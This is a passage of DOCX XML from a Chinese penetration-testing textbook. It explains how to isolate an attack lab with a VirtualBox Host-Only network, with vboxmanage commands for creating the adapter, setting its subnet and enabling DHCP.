        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">apt update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、下载工具或访问外部的威胁情报源；第二张绑定到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，用于与靶机通信并作为攻击流量的“战场通道”。务必在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内设置路由度量值（metric），确保默认路由指向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网卡，从而避免攻击流量意外经由宿主机物理网卡发出②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机（Metasploitable2/3、DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅配置一张虚拟网卡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，绑定到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。靶机不应有任何访问外部网络或公网的能力——这不仅防止靶机中潜在的内置恶意软件“回联”（phone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">home）到真实</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，也防止你在靶机上误执行反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，回连流量意外公网暴露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节下文将详细演示如何创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络并将虚拟机绑定至此网络。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="42" w:name="创建-host-only-隔离网络靶机实操单元"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离网络——靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在开始配置之前，请确保已在你的物理机上安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle VM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox（本书演示使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7.0.x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列，核心命令语法跨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7.x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">兼容①；具体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GUI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">菜单位置可能因版本细微变化②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：理解本节的网络配置需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础——IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址、子网掩码、CIDR、默认网关、DHCP。这些内容已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章完整讲授，本节直接使用不再重讲。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">工具依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Oracle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已安装（官网</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> virtualbox.org </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下载）；宿主机需具备管理员/root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限以创建虚拟网络适配器（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">宿主需将当前用户加入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxusers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">后续依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节创建的网络是第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节部署攻击机与靶机的直接前置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="38" w:name="步骤-1创建-host-only-虚拟网络"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1：创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟网络</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络是一个全局资源，不隶属于任何特定虚拟机。我们可以通过图形界面或命令行两种方式创建。推荐使用命令行——它不仅可复现、可脚本化，也让我们得以精确控制网络参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打开宿主机的终端（Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD），执行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络并配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">子网</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 创建一个新的 Host-Only 网络适配器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostonlyif create</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该命令的输出将显示新创建的适配器名称（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。接下来，为该适配器配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址和子网掩码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 配置 Host-Only 网络的 IP 地址和子网掩码</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 本书使用 192.168.56.0/24 作为实验室默认子网（见附录约定）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># &lt;LAB_SUBNET&gt; = 192.168.56.0/24 实际环境可自定义②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostonlyif ipconfig vboxnet0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--netmask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[环境说明]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子网，本书沿用此惯例。如果你的物理机所在局域网恰好也使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（可能性较低），或你已经安装了其他虚拟化软件占用了此子网，请将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更换为其他私有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.100.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">务必确保实验子网与你宿主机的物理网络子网不重叠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">（可选）启用/配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络默认不启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器。这意味着连接到该网络的虚拟机需要手动配置静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP。为简化靶机和攻击机的初始联网，我们可以选择启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 为 Host-Only 网络启用 DHCP 服务器，分配地址池</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dhcpserver add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--ifname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vboxnet0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.100 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--netmask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 255.255.255.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--lowerip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.101 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--upperip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.254</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxmanage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dhcpserver modify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--ifname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vboxnet0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[注意]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器仅是便利选项，非必须。在生产化的渗透测试实验环境中，许多实践者偏好为靶机分配静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，以避免</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">租约变化导致靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漂移，进而需要反复修改攻击脚本中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位符。本书的后续实操单元将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">同时教授两种方式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">——DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">动态获取与静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
